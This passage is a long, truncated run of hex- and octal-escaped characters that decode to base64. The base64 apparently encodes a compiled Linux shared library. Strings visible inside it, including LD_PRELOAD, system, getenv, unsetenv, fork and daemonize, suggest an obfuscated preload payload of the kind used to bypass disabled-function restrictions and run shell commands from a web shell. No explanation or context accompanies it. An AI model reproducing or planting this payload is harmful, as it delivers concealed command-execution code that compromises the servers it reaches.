x41\x41\x41\101\147\101\101\x41\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\101\x41\101\101\x41\x4c\x49\101\101\x41\x41\x53\x41\x41\x41\x41\101\101\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\101\101\101\101\101\101\101\101\x4b\x4d\x41\101\101\101\x53\x41\x41\x41\101\x41\101\101\101\x41\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\x41\104\147\x41\x41\x41\x41\x67\x41\x41\101\101\101\x41\101\101\x41\101\101\x41\x41\101\101\101\101\x41\x41\x41\x41\101\101\101\101\106\x49\x41\101\x41\x41\151\101\x41\x41\101\x41\x41\x41\101\101\101\101\x41\101\x41\x41\101\101\101\101\x41\101\101\101\x41\101\x4a\x34\101\x41\x41\x41\x53\101\101\101\x41\x41\101\101\x41\101\101\101\x41\x41\101\101\101\x41\101\101\101\101\101\x41\x41\101\x4d\x55\101\101\101\x41\121\x41\102\x63\101\x61\x42\x41\147\x41\101\101\101\x41\x41\101\101\x41\101\x41\101\101\x41\x41\101\101\111\60\101\x41\x41\101\123\101\x41\x77\101\106\101\x6b\101\101\101\x41\x41\101\101\101\160\x41\101\x41\101\101\101\101\101\101\113\147\x41\x41\101\x41\x53\x41\101\167\101\x50\x51\153\101\101\101\101\101\x41\x41\101\x64\101\101\x41\x41\101\101\x41\x41\x41\x4e\147\101\x41\x41\x41\121\x41\102\147\101\x63\x42\101\x67\101\x41\101\101\101\101\101\101\x41\101\101\101\x41\x41\101\101\101\x4d\167\101\101\x41\x41\x51\x41\x42\x67\x41\141\102\x41\x67\x41\101\101\x41\101\101\101\x41\x41\x41\101\x41\x41\101\101\x41\101\102\x41\x41\x41\x41\x41\x53\101\x41\x6b\x41\x47\x41\143\101\101\x41\101\101\101\x41\101\x41\x41\x41\101\101\x41\x41\101\x41\101\102\x59\101\x41\101\x41\123\101\x41\60\x41\130\101\x6b\101\101\101\x41\x41\101\x41\x41\x41\x41\101\101\101\x41\101\101\x41\101\110\x55\x41\x41\x41\x41\123\x41\101\167\101\64\x41\147\101\101\x41\x41\x41\101\101\101\x30\x41\101\101\101\x41\101\x41\x41\101\101\102\146\130\62\x64\164\142\x32\154\146\143\63\x52\150\143\x6e\122\x66\130\x77\x42\x66\141\127\65\160\144\101\102\x66\132\155\x6c\165\x61\121\102\146\x53\x56\x52\116\130\x32\x52\x6c\143\x6d\x56\x6e\141\x58\x4e\60\132\x58\x4a\125\124\125\116\163\x62\62\65\x6c\x56\x47\x46\151\x62\107\x55\x41\130\60\x6c\x55\124\126\71\x79\132\x57\144\160\x63\63\x52\x6c\143\x6c\x52\x4e\x51\62\x78\166\x62\155\x56\125\131\127\112\163\132\x51\102\146\130\x32\x4e\x34\131\126\x39\x6d\x61\127\x35\x68\142\107\154\x36\x5a\121\102\146\123\x6e\132\x66\125\x6d\x56\x6e\x61\x58\116\x30\132\130\x4a\x44\x62\107\106\172\x63\62\x56\x7a\101\110\x42\63\142\147\x42\156\x5a\x58\x52\x6c\142\x6e\131\101\131\x32\150\164\142\x32\121\x41\x63\63\x6c\172\144\107\x56\x74\x41\x47\122\x68\x5a\x57\x31\x76\x62\155\x6c\x36\132\121\102\172\x61\x57\144\x75\131\127\x77\101\x5a\x6d\x39\x79\x61\167\x42\x6c\x65\107\x6c\60\101\x48\102\x79\132\127\170\x76\131\127\x52\164\132\x51\102\61\x62\156\116\154\x64\107\x56\165\144\x67\102\163\x61\127\112\x6a\x4c\156\x4e\166\x4c\x6a\131\x41\130\62\x56\x6b\131\x58\122\150\101\x46\x39\x66\x59\156\x4e\x7a\x58\x33\x4e\x30\131\x58\112\x30\101\x46\71\154\142\x6d\x51\101\122\x30\170\112\x51\x6b\116\x66\x4d\151\64\171\x4c\x6a\125\101\101\x41\x41\x41\x41\x67\101\x41\101\101\x49\x41\x41\x67\101\x41\101\x41\x49\x41\x41\101\101\103\101\101\111\101\101\x41\x41\103\x41\101\x49\101\101\x51\x41\x42\101\x41\x45\101\101\x51\x41\102\101\x41\105\x41\x41\121\101\102\x41\x41\x41\x41\101\101\101\x42\x41\101\x45\101\x75\167\101\x41\x41\x42\101\x41\x41\x41\x41\x41\101\101\x41\x41\x64\122\160\x70\103\121\x41\x41\x41\x67\104\144\x41\101\x41\101\x41\101\x41\101\101\x50\x67\116\111\x41\101\101\101\x41\101\x41\x43\101\101\x41\x41\x41\101\101\x41\101\103\x77\x43\101\x41\x41\101\x41\101\x41\101\101\147\117\x49\101\x41\x41\101\101\101\101\x43\x41\101\x41\101\101\x41\101\x41\x41\102\x77\103\x41\x41\101\101\x41\101\x41\x41\x47\x41\x51\x49\101\101\x41\x41\x41\x41\101\x43\x41\101\x41\101\101\101\x41\101\101\102\x67\105\x43\101\101\101\x41\101\101\101\101\x41\117\x49\101\101\101\101\101\x41\101\101\x51\101\x41\x41\101\70\x41\101\101\101\x41\x41\101\x41\x41\x41\x41\101\x41\x41\x4e\x67\x50\111\x41\x41\x41\101\101\x41\101\x42\x67\101\x41\101\x41\111\x41\x41\x41\x41\101\x41\101\101\x41\x41\101\101\101\x41\117\x41\120\x49\x41\101\x41\x41\101\x41\101\102\147\101\x41\101\x41\x55\x41\101\101\101\x41\101\101\101\101\101\101\x41\101\x41\x4f\x67\x50\111\x41\101\101\x41\x41\x41\101\102\147\101\x41\x41\101\x63\x41\x41\x41\101\101\x41\101\x41\101\101\101\101\x41\101\120\101\x50\111\101\x41\x41\101\101\101\x41\102\x67\x41\101\x41\x41\x6f\101\x41\101\101\x41\101\x41\101\101\x41\101\x41\x41\x41\120\147\x50\111\101\101\x41\x41\x41\x41\x41\x42\147\x41\101\101\x41\163\x41\101\x41\x41\x41\101\101\x41\x41\101\x41\x41\101\101\102\147\121\111\x41\101\x41\x41\101\x41\x41\x42\167\101\x41\101\101\x45\x41\x41\101\101\x41\x41\x41\x41\101\x41\x41\101\x41\x41\x43\101\121\111\101\x41\x41\101\101\101\101\x42\x77\x41\101\x41\101\64\x41\x41\101\101\x41\101\x41\x41\101\101\x41\101\101\101\103\147\121\x49\101\101\101\101\x41\101\101\x42\x77\101\101\x41\x41\x4d\101\101\101\x41\101\x41\x41\101\101\101\x41\x41\x41\101\x44\x41\121\x49\101\x41\x41\x41\101\101\101\x42\167\x41\101\x41\x42\121\x41\101\x41\x41\x41\101\101\101\101\x41\101\101\x41\101\x44\x67\x51\111\101\101\x41\x41\101\101\x41\x42\167\x41\101\101\x41\x51\x41\101\101\101\101\101\x41\101\x41\101\101\x41\101\x41\105\101\121\111\x41\101\101\x41\x41\x41\101\102\167\101\101\x41\101\x59\101\x41\101\x41\x41\101\101\101\101\101\101\x41\x41\x41\x45\147\121\x49\x41\x41\101\101\101\x41\x41\102\167\x41\x41\x41\101\x67\x41\x41\x41\x41\101\101\x41\101\101\x41\101\101\101\x41\x46\101\x51\x49\101\x41\x41\x41\x41\x41\101\102\167\101\101\101\101\x6b\x41\101\x41\x41\101\x41\x41\x41\101\101\101\x41\101\101\x46\147\x51\111\x41\x41\x41\101\x41\x41\101\102\x77\x41\x41\101\x41\167\101\x41\101\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\x45\151\x44\x37\x41\150\x49\x69\x77\x57\x39\x43\103\x41\x41\x53\x49\x58\x41\x64\x41\114\x2f\60\x45\x69\x44\x78\x41\x6a\x44\101\x50\70\x31\60\x67\147\x67\101\x50\x38\154\x31\101\x67\147\101\101\x38\146\x51\x41\x44\57\112\x64\x49\x49\x49\x41\102\x6f\101\x41\x41\101\x41\117\156\147\57\57\x2f\57\x2f\x79\130\x4b\x43\103\101\x41\x61\101\105\x41\101\x41\104\160\60\120\x2f\x2f\57\x2f\70\154\167\x67\x67\147\101\x47\x67\103\101\x41\101\x41\x36\143\104\x2f\x2f\x2f\57\57\x4a\x62\157\111\x49\101\102\x6f\101\x77\101\101\101\x4f\155\167\57\x2f\x2f\x2f\57\x79\127\171\x43\103\x41\101\141\101\x51\x41\101\x41\104\x70\x6f\x50\x2f\57\x2f\x2f\70\x6c\x71\147\x67\x67\x41\x47\x67\x46\x41\x41\x41\x41\66\132\x44\x2f\57\x2f\x2f\x2f\112\x61\111\111\x49\101\102\157\x42\x67\101\x41\101\x4f\155\x41\57\x2f\57\x2f\x2f\171\x57\141\103\x43\101\x41\141\x41\143\101\x41\x41\x44\160\x63\x50\57\57\x2f\57\x38\154\153\147\x67\x67\101\107\147\111\101\x41\101\x41\x36\x57\x44\x2f\57\x2f\x2f\x2f\x4a\x53\111\111\111\101\102\x6d\x6b\101\x41\101\x41\x41\101\101\x41\x41\101\x41\123\111\x30\x39\x67\x51\x67\147\101\x45\x69\116\x42\131\105\x49\x49\101\x42\x56\123\103\x6e\64\123\x49\x6e\154\x53\x49\120\x34\104\156\131\126\123\x49\163\106\61\x67\x63\x67\x41\105\151\x46\x77\x48\121\112\x58\x66\x2f\147\x5a\x67\70\x66\x52\x41\x41\x41\130\x63\115\120\110\60\101\x41\132\x69\x34\x50\110\64\121\x41\101\101\x41\x41\101\105\x69\116\x50\125\x45\111\x49\x41\102\x49\152\x54\x55\x36\x43\x43\x41\101\x56\125\x67\x70\x2f\x6b\x69\x4a\65\x55\152\x42\x2f\147\x4e\x49\x69\x66\x42\111\167\x65\x67\57\123\x41\x48\107\x53\x4e\x48\53\x64\102\150\x49\x69\x77\127\x68\102\171\101\101\x53\x49\130\101\x64\x41\x78\144\x2f\53\x42\155\x44\170\53\105\101\101\101\101\101\x41\102\144\x77\x77\x38\x66\121\101\x42\155\114\147\70\146\x68\x41\x41\101\x41\x41\101\101\147\104\63\170\102\x79\x41\101\101\x48\125\x6e\x53\111\115\71\x64\x77\143\x67\x41\x41\x42\x56\x53\x49\156\x6c\x64\101\x78\x49\x69\172\63\x53\102\171\x41\x41\x36\104\x33\57\57\57\x2f\x6f\x53\120\57\57\x2f\x31\x33\x47\102\143\x67\110\111\101\x41\x42\70\70\x4d\x50\x48\60\101\x41\132\151\x34\x50\110\64\x51\x41\101\101\x41\101\x41\105\x69\x4e\x50\126\x6b\x46\111\x41\x42\111\x67\172\x38\101\x64\x51\x76\x70\130\x76\x2f\57\x2f\x32\131\120\x48\x30\x51\x41\101\105\x69\114\102\122\x6b\110\111\101\x42\111\x68\143\102\x30\66\x56\126\x49\151\x65\130\57\x30\x46\63\x70\121\120\x2f\57\57\x31\126\111\x69\145\x56\x49\152\x54\x31\x36\x41\x41\x41\101\66\106\x44\53\57\57\53\53\x2f\167\105\101\x41\x45\x69\x4a\x78\53\151\124\x2f\x76\x2f\57\x53\111\x30\71\131\x51\101\x41\101\x4f\147\63\x2f\166\x2f\57\x53\x49\156\x48\x36\105\x2f\x2b\57\57\x2b\121\x58\x63\x4e\x56\x53\111\x6e\x6c\166\147\x45\x41\x41\101\x43\57\x41\x51\x41\x41\101\117\150\132\57\166\57\57\x36\112\124\53\57\57\x2b\106\167\110\x51\x4b\166\167\101\101\x41\101\x44\157\x64\x76\x37\x2f\57\65\102\144\167\x31\126\111\151\145\x56\111\152\124\60\154\x41\101\101\x41\66\106\x50\x2b\x2f\57\x2f\x6f\x2f\166\x33\x2f\57\53\147\132\x2f\166\x2f\57\153\x46\x33\104\x41\101\102\111\147\x2b\167\111\123\x49\x50\105\x43\115\x4e\x44\x53\x45\x46\x4f\x53\x31\x4a\x50\x41\x45\x78\105\130\61\x42\x53\x52\x55\170\120\121\x55\x51\101\x41\122\x73\x44\117\172\x51\x41\x41\101\x41\x46\101\101\x41\101\x75\x50\x33\57\x2f\x31\x41\x41\101\101\x42\131\x2f\166\57\x2f\x65\101\x41\x41\101\x47\152\57\57\57\53\x51\x41\x41\x41\101\x6e\x50\x2f\57\57\67\x41\x41\x41\101\x44\106\57\x2f\x2f\x2f\60\x41\x41\101\101\101\x41\x41\x41\101\101\125\101\101\x41\101\101\x41\x41\101\101\x41\x46\x36\x55\147\101\102\145\x42\101\102\x47\167\167\x48\103\x4a\x41\102\101\101\101\153\101\101\101\101\110\101\x41\x41\101\x47\x44\71\x2f\x2f\x2b\147\101\x41\101\101\x41\x41\64\121\122\x67\x34\131\123\147\x38\114\x64\x77\151\101\x41\x44\x38\141\x4f\171\157\172\x4a\103\111\101\x41\x41\101\x41\106\x41\x41\x41\x41\105\x51\x41\101\101\104\131\x2f\146\57\x2f\103\x41\x41\101\101\101\x41\x41\x41\x41\x41\x41\x41\101\x41\101\x48\x41\101\101\101\x46\x77\101\x41\x41\104\121\57\166\x2f\x2f\x4e\x41\101\101\x41\101\x42\102\104\150\x43\107\x41\153\x4d\116\102\x6d\x38\115\x42\167\x67\x41\x41\x41\101\143\101\x41\x41\101\146\x41\x41\101\x41\117\124\53\57\57\70\x70\101\x41\101\101\101\x45\x45\117\105\111\x59\103\121\167\60\107\x5a\101\167\x48\x43\101\x41\x41\101\102\167\101\101\101\x43\x63\x41\101\x41\x41\67\x66\67\57\x2f\170\x30\101\101\x41\x41\x41\x51\121\64\121\x68\x67\112\104\104\121\132\x59\x44\101\x63\x49\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\x41\101\x41\x41\x41\101\101\x41\101\x41\x41\x41\x41\101\101\x41\x41\x41\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\x41\101\x41\x41\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\x41\101\x41\x41\101\x41\x41\101\101\x41\101\101\x41\x41\101\101\101\101\x41\x41\x41\x41\101\101\101\101\x41\x41\x41\101\101\x41\x41\x41\x41\x41\x41\x41\101\x41\101\101\x41\x41\101\101\101\x41\101\101\x41\101\x41\101\101\101\101\101\101\101\x41\x41\101\x41\101\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\x41\101\101\x41\101\101\101\101\101\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\101\101\101\101\x41\101\101\101\101\x41\x41\101\x41\x41\101\101\101\101\101\101\101\x41\101\x41\101\x41\x41\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\x41\101\101\101\x41\101\101\x41\101\101\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\101\x41\101\x41\x41\x41\x41\101\101\101\101\x41\101\101\101\101\101\101\x41\101\x41\x41\x41\101\101\101\101\x41\101\101\x41\x41\x41\x41\x41\101\101\x41\101\101\x41\101\x41\x41\x41\101\x41\101\101\x41\101\101\101\101\x41\x41\101\101\x41\101\x41\101\x41\101\101\x41\101\101\101\x41\x41\101\x41\x41\x41\101\101\101\101\101\x41\101\101\x41\x41\x41\101\101\101\101\101\101\x41\101\x41\101\101\x41\x41\101\x41\x41\101\101\101\x41\x41\x41\101\101\x41\101\101\x41\101\x41\101\x41\101\101\x41\x41\x41\x41\101\x41\101\101\x41\x41\x41\101\101\x41\x41\101\x41\x41\x41\101\x41\x41\101\x41\x41\x41\x41\x41\101\101\x41\x41\x41\x41\x41\101\x41\x41\x41\x41\x41\101\x41\x41\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\101\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\101\101\x41\x41\101\101\101\101\101\x41\x41\101\x41\101\x41\x41\101\101\x41\101\101\101\x41\101\101\x41\x41\x41\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\x41\x41\x41\x41\x41\x41\101\x41\x41\x41\x41\101\101\101\101\101\x41\x41\101\x41\101\x41\101\x41\101\x41\101\101\x41\101\x41\101\x41\x41\101\101\x41\x41\x41\101\x41\101\x41\x41\x41\101\101\x41\101\101\101\101\x41\x41\101\101\101\x41\101\101\x41\101\x41\x41\x41\x41\101\101\x41\101\x41\x41\101\101\x41\101\x41\101\101\101\101\101\x41\101\101\x41\x41\101\x41\101\x41\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x41\x41\101\101\101\x41\x41\x41\101\x41\101\x41\x41\x41\101\x41\x41\101\101\x41\101\101\x41\101\101\x41\101\x41\101\x41\x41\x41\101\101\101\x41\101\101\x41\x41\101\101\101\101\x41\101\x41\x41\101\x41\x41\101\x41\x41\101\101\101\101\101\101\101\101\x41\x41\x41\x41\x41\101\101\x41\x41\101\101\x41\101\101\101\101\101\x41\101\x41\x41\101\x41\x41\x41\101\x41\101\101\x41\101\101\101\101\101\101\101\101\101\101\101\101\101\x41\x41\x41\101\x41\x41\101\x41\x41\x41\x41\x41\101\101\x41\x41\x41\101\101\101\x41\x41\101\101\x41\x41\101\101\101\101\101\101\101\101\101\101\x41\x41\x41\101\101\101\x41\x41\x41\x41\101\101\x41\101\x41\x41\101\101\101\101\101\101\101\101\101\x41\101\x41\x41\101\x41\x41\101\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\101\x41\101\x41\x41\x41\101\101\101\101\101\x41\101\101\101\101\x41\x41\101\x41\x41\x41\x41\101\x41\101\x41\101\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\101\x41\x41\x41\101\x41\101\101\101\101\101\x41\101\101\x41\101\x41\x41\x41\x41\x41\101\101\x41\101\101\101\101\101\101\x41\101\101\101\101\x41\101\x41\101\101\x41\101\x41\101\x41\101\x41\x41\x41\101\101\x41\101\101\101\101\101\x41\101\101\x41\101\101\x41\101\101\101\101\101\x41\101\x41\x41\101\x41\101\x41\101\101\101\x41\101\x41\101\x41\101\x41\x41\101\101\x41\x41\x41\101\101\101\101\x41\101\x41\101\x41\x41\101\101\x41\x41\101\101\101\x41\101\x41\101\x41\101\101\x41\101\101\101\x41\x41\x41\101\101\x41\x41\x41\101\x41\x41\x41\101\x41\101\101\x41\101\101\x41\101\101\101\x41\101\101\x41\101\101\x41\101\x41\101\101\x41\101\x41\101\x41\x41\x41\101\x41\x41\101\101\x41\x41\101\101\x41\x41\101\x41\101\x41\x41\101\101\x41\101\101\x41\x41\101\x41\x41\x41\101\101\101\101\x41\x41\x41\x41\101\101\101\101\101\x41\101\101\x41\x41\x41\101\x41\x41\101\101\101\x41\x41\x41\x41\101\x41\101\x41\x41\x41\x41\x41\101\x41\x41\101\101\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\101\101\101\x41\101\101\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\x41\x41\101\x41\x41\101\101\x41\101\101\101\101\x41\101\x41\101\x41\x41\101\x41\101\x41\101\101\x41\x41\101\101\x41\101\x41\101\101\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\101\x41\101\x41\101\x41\101\x41\x41\x41\x41\x41\101\101\101\101\x41\101\101\101\101\x41\x41\x41\x41\x41\x41\101\101\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x41\101\101\101\x41\x41\101\101\101\101\x41\101\x41\101\x41\101\101\x41\x41\101\101\x41\x41\x41\x41\x41\101\101\101\101\101\x41\x41\101\101\101\101\x41\x41\x41\101\x41\x41\x41\101\101\101\x41\x41\101\x41\101\x41\101\101\101\101\101\x41\101\101\x41\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\101\101\x41\x41\163\101\147\101\101\101\101\101\101\x41\101\x41\101\101\101\101\x41\x41\101\101\101\x48\x41\111\x41\101\x41\x41\x41\101\101\x41\x41\101\101\101\101\x41\101\x41\101\x41\101\x42\x41\101\101\101\101\101\x41\101\x41\x4c\x73\x41\101\x41\101\x41\101\101\101\x41\x44\x41\101\x41\x41\101\x41\x41\101\x41\101\x59\102\167\x41\101\x41\x41\x41\x41\101\x41\x30\x41\101\101\101\101\x41\101\101\x41\x58\101\153\101\x41\101\101\101\101\101\x41\132\101\x41\101\101\x41\101\x41\x41\x41\x50\147\116\111\x41\101\101\x41\x41\101\101\107\x77\x41\101\101\101\101\x41\101\x41\101\x51\x41\x41\x41\x41\101\101\x41\101\101\x42\x6f\101\101\x41\101\101\x41\101\x41\101\103\101\x34\147\x41\101\x41\101\101\x41\101\143\x41\101\x41\x41\x41\101\101\101\x41\x41\147\x41\101\101\101\x41\x41\x41\101\101\71\x66\x37\x2f\x62\167\x41\101\x41\101\104\167\x41\x51\x41\x41\x41\x41\x41\x41\101\101\125\101\x41\x41\x41\101\x41\x41\x41\101\115\101\121\x41\x41\x41\101\101\101\x41\x41\x47\101\101\101\101\x41\x41\101\x41\x41\x44\x67\x43\x41\101\x41\x41\x41\x41\x41\x41\103\x67\101\x41\x41\101\101\x41\101\x41\x44\x70\101\101\101\x41\101\101\x41\101\101\101\x73\x41\101\x41\x41\x41\x41\x41\x41\101\x47\x41\101\101\x41\x41\101\x41\x41\101\x41\104\x41\x41\101\101\x41\101\x41\x41\x41\x41\x41\x51\111\101\x41\x41\101\101\x41\101\101\147\x41\101\101\x41\101\x41\101\x41\104\x59\x41\101\101\101\x41\x41\x41\101\101\x42\121\101\x41\x41\x41\x41\x41\x41\x41\x41\x42\x77\x41\x41\101\101\101\x41\101\x41\101\x58\101\x41\101\x41\101\x41\101\101\101\x45\x41\107\x41\x41\101\x41\101\x41\x41\x41\x42\x77\x41\101\x41\x41\x41\101\x41\101\x42\x6f\x42\x51\101\101\101\101\101\x41\x41\101\147\101\101\101\101\x41\x41\x41\x41\101\x32\x41\101\101\x41\101\101\101\101\x41\101\112\101\x41\101\x41\101\101\x41\101\101\x42\x67\x41\x41\101\x41\x41\x41\x41\x41\x41\x2f\x76\57\57\x62\167\x41\101\x41\101\x42\111\x42\121\x41\x41\x41\101\x41\x41\x41\120\x2f\57\x2f\62\70\x41\101\101\x41\x41\101\121\x41\101\x41\x41\x41\101\x41\101\x44\167\x2f\x2f\x39\x76\101\x41\101\101\x41\102\x6f\x46\x41\101\x41\x41\101\101\x41\x41\53\x66\x2f\x2f\142\167\101\101\101\x41\x41\x44\101\x41\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\101\x41\101\x41\101\101\101\x41\101\x41\x41\101\x41\101\x41\x41\101\x41\101\101\x41\x41\x41\101\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\x41\x41\101\101\x41\x41\x41\101\101\101\101\x41\x41\101\x41\101\101\101\101\x41\101\101\101\101\101\x41\101\x41\x41\x41\101\101\101\101\101\101\x41\101\101\x41\101\101\x41\x41\101\101\x41\x41\101\101\x41\x41\101\x41\101\101\x41\x41\x41\101\101\101\101\101\101\101\x41\x41\101\101\x41\x41\101\x41\x41\101\101\101\x41\x41\101\101\101\x41\x41\x41\x41\x41\x41\x41\101\101\101\101\x41\x41\x41\101\x41\x41\101\101\101\x41\101\x41\x41\x41\x42\x67\117\111\101\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\101\101\101\101\101\101\x41\101\x45\131\110\101\101\x41\x41\101\101\101\101\126\147\143\x41\101\x41\x41\x41\101\x41\x42\155\x42\x77\101\x41\x41\x41\101\101\x41\110\131\x48\101\101\x41\101\101\101\101\101\150\147\x63\x41\x41\101\x41\101\101\x41\103\127\x42\167\x41\x41\101\x41\x41\x41\101\113\x59\x48\x41\x41\x41\101\x41\x41\101\x41\x74\147\143\x41\101\x41\x41\101\101\x41\x44\x47\x42\167\101\x41\x41\x41\101\101\101\107\x41\121\111\x41\101\x41\101\101\x41\122\x30\116\104\x4f\151\x41\x6f\x52\x47\x56\151\x61\127\x68\x75\111\104\131\165\x4d\x79\64\167\x4c\x54\x45\x34\x4b\x32\x52\154\x59\x6a\x6c\x6c\115\123\153\147\x4e\151\64\x7a\114\152\x41\x67\115\152\x41\x78\116\x7a\x41\x31\115\124\x59\x41\x41\101\x41\x41\x41\101\x41\x41\x41\101\x41\x41\101\x41\101\101\101\101\101\x41\101\x41\x41\x41\101\x41\x41\101\101\x41\101\101\x41\101\101\101\x41\x41\101\101\x41\x41\x4d\x41\x41\121\104\111\101\121\101\x41\x41\x41\x41\x41\101\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\x41\x41\101\101\101\x41\115\x41\101\x67\104\x77\x41\121\101\101\x41\101\101\101\101\101\x41\101\101\101\x41\101\101\101\x41\101\101\x41\101\101\x41\101\115\101\x41\x77\101\64\x41\x67\101\x41\101\x41\x41\101\101\x41\101\101\x41\x41\101\101\x41\101\x41\x41\101\x41\101\101\101\101\115\101\x42\101\x41\167\102\101\101\x41\101\x41\x41\101\x41\101\101\101\101\101\x41\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\x4d\101\102\121\101\141\x42\121\101\x41\x41\x41\x41\x41\101\x41\x41\101\101\101\x41\101\x41\101\101\x41\101\101\101\101\x41\x41\115\101\102\147\x42\111\x42\121\x41\x41\101\x41\101\x41\x41\101\x41\x41\x41\101\x41\101\x41\101\x41\101\101\x41\101\101\101\x41\x4d\x41\102\167\102\x6f\x42\x51\101\101\101\x41\101\101\101\101\x41\x41\x41\101\101\x41\101\x41\x41\x41\x41\101\101\x41\101\x41\x4d\x41\x43\x41\102\101\x42\147\x41\x41\x41\101\x41\x41\101\101\101\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\x41\x41\115\101\x43\121\101\x59\102\167\x41\x41\101\101\x41\101\101\x41\x41\x41\101\101\101\101\101\101\x41\x41\x41\x41\101\x41\x41\101\115\x41\x43\147\x41\x77\102\167\x41\101\101\101\101\x41\x41\x41\101\x41\101\x41\x41\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\x4d\x41\103\167\x44\x51\102\x77\101\x41\101\101\101\x41\x41\101\x41\101\101\101\101\101\x41\x41\101\101\x41\101\x41\101\x41\x41\115\x41\104\101\104\x67\x42\167\101\x41\x41\x41\x41\101\101\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\x41\101\101\101\101\x41\x41\115\101\x44\121\x42\x63\x43\x51\101\101\101\101\x41\101\101\101\x41\x41\x41\x41\101\x41\x41\101\101\x41\101\x41\x41\101\101\101\x4d\101\x44\147\x42\154\x43\121\101\101\101\x41\x41\101\x41\x41\101\101\101\x41\101\x41\x41\x41\x41\101\101\101\x41\x41\101\x41\115\101\104\167\x42\64\x43\x51\x41\x41\101\101\101\x41\x41\x41\x41\101\x41\101\x41\x41\101\101\101\x41\101\101\x41\x41\101\x41\115\101\x45\x41\x43\167\103\121\x41\x41\x41\x41\x41\101\x41\x41\x41\x41\101\101\x41\x41\x41\101\101\x41\101\x41\x41\101\x41\101\x4d\x41\105\121\104\x34\104\x53\x41\x41\x41\101\x41\101\101\101\101\x41\101\101\x41\101\x41\101\101\101\x41\x41\101\101\x41\101\115\101\x45\147\x41\111\104\151\x41\101\101\101\x41\101\101\101\x41\101\101\x41\101\x41\101\101\101\101\x41\x41\x41\x41\x41\101\x4d\101\x45\x77\101\x51\104\x69\101\x41\101\x41\x41\x41\x41\x41\101\101\x41\x41\101\x41\x41\101\x41\x41\101\101\101\x41\101\x41\115\x41\x46\101\101\131\x44\x69\101\101\x41\x41\x41\101\101\101\101\x41\x41\101\101\x41\101\101\101\101\101\x41\x41\101\x41\101\115\x41\x46\121\104\x59\x44\x79\101\101\x41\101\101\101\101\101\101\101\101\x41\101\x41\101\101\101\101\101\101\101\101\x41\x41\115\101\x46\147\x41\101\105\x43\101\x41\101\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\101\101\101\x41\x41\101\101\x41\101\x41\101\115\101\x46\x77\102\147\x45\103\x41\101\101\x41\101\x41\101\x41\101\x41\101\101\x41\101\x41\x41\x41\101\x41\101\x41\101\101\101\115\x41\x47\101\102\157\x45\103\101\101\101\x41\101\x41\x41\x41\101\x41\101\x41\101\x41\x41\101\101\x41\101\x41\x41\101\101\101\x4d\x41\107\121\x41\101\101\101\x41\x41\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x51\101\101\x41\x41\x51\101\70\146\x38\101\101\101\101\101\101\101\101\101\101\x41\x41\x41\x41\101\101\101\x41\101\101\101\104\x41\x41\x41\x41\x41\x45\x41\105\167\101\121\104\151\x41\x41\x41\x41\101\101\x41\x41\101\101\x41\101\101\x41\x41\101\x41\101\x47\121\101\x41\101\x41\x49\x41\104\101\x44\x67\102\x77\x41\101\101\101\x41\101\101\101\101\101\101\x41\101\x41\x41\101\x41\x41\x47\167\x41\101\x41\x41\111\101\104\101\101\147\103\x41\x41\x41\101\101\x41\101\x41\101\x41\101\x41\101\x41\x41\101\x41\101\101\x4c\147\x41\x41\x41\101\x49\x41\x44\x41\102\167\103\x41\101\101\101\x41\101\x41\101\101\x41\x41\101\101\101\x41\x41\101\x41\x41\x52\x41\101\101\101\101\x45\x41\107\101\x42\157\x45\x43\101\x41\x41\x41\x41\x41\x41\101\x45\101\101\x41\101\x41\x41\x41\101\x41\125\167\101\101\101\x41\x45\101\x45\x67\101\111\104\x69\101\101\101\101\101\x41\101\101\x41\101\101\101\x41\101\x41\x41\101\x41\145\x67\x41\x41\x41\101\111\101\x44\101\103\x77\x43\101\x41\101\x41\101\101\101\x41\x41\101\x41\x41\x41\x41\x41\101\x41\x41\101\x68\147\101\x41\x41\101\x45\101\x45\121\x44\x34\104\x53\101\x41\x41\x41\x41\101\101\101\101\101\x41\x41\101\101\101\x41\x41\101\160\121\101\101\x41\x41\x51\101\x38\146\70\x41\x41\x41\x41\x41\x41\101\x41\x41\101\x41\101\x41\101\101\101\101\101\101\101\x41\101\121\x41\x41\101\101\121\101\x38\x66\70\101\x41\x41\101\x41\x41\x41\101\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\162\x41\x41\101\101\101\105\x41\105\x41\x42\157\103\x67\101\101\x41\101\x41\x41\101\101\101\101\x41\x41\101\101\101\101\101\101\165\147\101\x41\x41\101\x45\101\105\x77\x41\121\x44\151\x41\101\101\101\x41\101\101\101\101\101\101\101\x41\x41\101\101\x4